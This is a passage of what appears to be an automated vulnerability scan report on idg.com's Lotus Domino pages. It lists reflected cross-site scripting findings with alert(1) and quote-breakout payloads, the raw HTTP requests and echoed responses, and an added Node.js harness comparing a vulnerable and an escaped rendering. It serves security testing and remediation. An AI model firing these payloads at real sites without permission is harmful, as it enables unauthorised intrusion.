Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?c444a"-alert(1)-"ebcd302b3e9=1");
} catch(err) {}</script>
...[SNIP]...

2.176. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/06PageStyle.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a290d"%3b812db769f64 was submitted in the REST URL parameter 1. This input was echoed as a290d";812db769f64 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwa290d"%3b812db769f64/homenew.nsf/06PageStyle.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwa290d";812db769f64/homenew.nsf/06PageStyle.css");
} catch(err) {}</script>
...[SNIP]...

2.177. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/06PageStyle.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 380eb"%3bcca6040fbac was submitted in the REST URL parameter 3. This input was echoed as 380eb";cca6040fbac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/06PageStyle.css380eb"%3bcca6040fbac HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/06PageStyle.css380eb";cca6040fbac");
} catch(err) {}</script>
...[SNIP]...

2.178. http://idg.com/www/homenew.nsf/06PageStyle.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/06PageStyle.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5875"-alert(1)-"4e33749b853 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/06PageStyle.css?e5875"-alert(1)-"4e33749b853=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/06PageStyle.css?e5875"-alert(1)-"4e33749b853=1");
} catch(err) {}</script>
...[SNIP]...

2.179. http://idg.com/www/homenew.nsf/DataRequestor.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f89bd"-alert(1)-"7fffc015d88 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibraryf89bd"-alert(1)-"7fffc015d88 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5052
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibraryf89bd"-alert(1)-"7fffc015d88");
} catch(err) {}</script>
...[SNIP]...

2.180. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ed7"%3b4d8994ca061 was submitted in the REST URL parameter 1. This input was echoed as e9ed7";4d8994ca061 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwe9ed7"%3b4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5042
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwe9ed7";4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.181. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51509"%3bdad758df106 was submitted in the REST URL parameter 3. This input was echoed as 51509";dad758df106 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js51509"%3bdad758df106?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5042
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js51509";dad758df106?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.182. http://idg.com/www/homenew.nsf/DataRequestor.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40b14"-alert(1)-"47ec7171e3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, inside the _trackPageview("IDG.com - Page not found - ...") call of the Lotus Domino error page, which concatenates the requested URI (path and query string) into a double-quoted string literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the echoed text closes the string literal, evaluates alert(1) as an operand of the subtraction, and reopens a string, so the resulting statement is syntactically valid and the injected call runs when the error page loads. Note that the server answers 400 Bad Request, but the response body is still the full error page with the script block, so the status code offers no protection.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5033
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1");
} catch(err) {}</script>
...[SNIP]...
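Every finding on this page shares one sink: the Lotus Domino error template concatenates the requested URI into the double-quoted argument of _trackPageview(...). The block below is an added example, not code from this report or from IDG's site, that reproduces that concatenation in Node.js beside a hardened rendering, then executes each rendered snippet with a stub _gat object and a stub alert() to show what the page actually does with the two payload shapes seen above: the "-alert(1)-" form from this finding (Certain) and the "%3b form from the REST URL parameter findings (Firm). The tracker ID, the function names and the harness are assumptions of the example; the snippet shape and the payload strings are taken from the requests and responses in the report.

```javascript
// Added example (not from the report or from IDG/Domino): the error page's
// Google Analytics snippet rendered the way the responses above show it
// (request URI concatenated into a "..." literal) beside a hardened version,
// plus a harness that executes the rendered snippet with stubbed globals.

const TRACKER_ID = 'UA-XXXXXX-X'; // placeholder tracker ID (assumption)

// Vulnerable rendering: the decoded request URI is spliced straight into the
// double-quoted string argument, exactly the shape seen in the responses.
function renderTrackingVulnerable(requestUri) {
  return (
    'try {\n' +
    '  var pageTracker = _gat._getTracker("' + TRACKER_ID + '");\n' +
    '  pageTracker._trackPageview("IDG.com - Page not found - ' + requestUri + '");\n' +
    '} catch (err) {}\n'
  );
}

// Serialise an arbitrary value as a JavaScript string literal that is safe to
// embed in an inline <script> block: JSON.stringify escapes quote, backslash
// and control characters; the extra replacements neutralise "</script>" and
// "<!--" inside the data and the two line terminators JSON leaves raw.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering: every dynamic value goes through jsStringLiteral().
function renderTrackingSafe(requestUri) {
  const label = 'IDG.com - Page not found - ' + requestUri;
  return (
    'try {\n' +
    '  var pageTracker = _gat._getTracker(' + jsStringLiteral(TRACKER_ID) + ');\n' +
    '  pageTracker._trackPageview(' + jsStringLiteral(label) + ');\n' +
    '} catch (err) {}\n'
  );
}

// Execute a rendered snippet the way the browser would, with _gat and alert
// replaced by stubs, and report what happened:
//   syntaxError  - the whole script block failed to parse (nothing ran)
//   alertFired   - the injected alert() was reached
//   tracked      - the argument _trackPageview() actually received
function runSnippet(snippet) {
  const result = { syntaxError: false, alertFired: false, tracked: undefined };
  const gat = {
    _getTracker() {
      return { _trackPageview(arg) { result.tracked = arg; } };
    },
  };
  const alert = () => { result.alertFired = true; };
  let fn;
  try {
    fn = new Function('_gat', 'alert', snippet);
  } catch (e) {
    if (e instanceof SyntaxError) { result.syntaxError = true; return result; }
    throw e;
  }
  fn(gat, alert);
  return result;
}

// Compare both renderings for one request URI, given as the server sees it
// after URL decoding (which is how Domino echoed %3b as ";").
function compare(requestUri) {
  return {
    vulnerable: runSnippet(renderTrackingVulnerable(requestUri)),
    safe: runSnippet(renderTrackingSafe(requestUri)),
  };
}

// Payloads copied from the findings above.
const CERTAIN_URI = '/www/homenew.nsf/DataRequestor.js?40b14"-alert(1)-"47ec7171e3d=1';
const FIRM_URI = '/wwwe9ed7";4d8994ca061/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(compare(CERTAIN_URI), null, 2));
  console.log(JSON.stringify(compare(FIRM_URI), null, 2));
}
```

Running it gives three distinct outcomes. For the "-alert(1)-" payload the vulnerable rendering fires alert() and hands _trackPageview a NaN (the label minus undefined minus a string), which is the Certain case. For the "%3b payload the vulnerable rendering throws SyntaxError at parse time, because 4d8994ca061 is not a valid token, so the browser would discard the whole script block without running anything; that is why the scanner could only report Firm. The hardened rendering returns the label intact for both payloads and never reaches alert(). JSON.stringify alone is not sufficient inside an inline script element, since a literal </script> in the data would end the element before the JavaScript parser ever saw it, hence the extra escaping of < and >.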

2.183. http://idg.com/www/homenew.nsf/JSLib.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39582"-alert(1)-"aaf4e6f2b15 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary39582"-alert(1)-"aaf4e6f2b15 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5044
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary39582"-alert(1)-"aaf4e6f2b15");
} catch(err) {}</script>
...[SNIP]...

2.184. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0cb"%3be2536f463e8 was submitted in the REST URL parameter 1. This input was echoed as 6d0cb";e2536f463e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www6d0cb"%3be2536f463e8/homenew.nsf/JSLib.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5034
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www6d0cb";e2536f463e8/homenew.nsf/JSLib.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.185. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f944"%3bff3d0453a55 was submitted in the REST URL parameter 3. This input was echoed as 3f944";ff3d0453a55 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js3f944"%3bff3d0453a55?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5034
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js3f944";ff3d0453a55?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.186. http://idg.com/www/homenew.nsf/JSLib.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a46a"-alert(1)-"27e933b060b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js?6a46a"-alert(1)-"27e933b060b=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?6a46a"-alert(1)-"27e933b060b=1");
} catch(err) {}</script>
...[SNIP]...

2.187. http://idg.com/www/homenew.nsf/ajaxroutine.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d323a"-alert(1)-"85f83ae81d0 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryd323a"-alert(1)-"85f83ae81d0 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5050
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
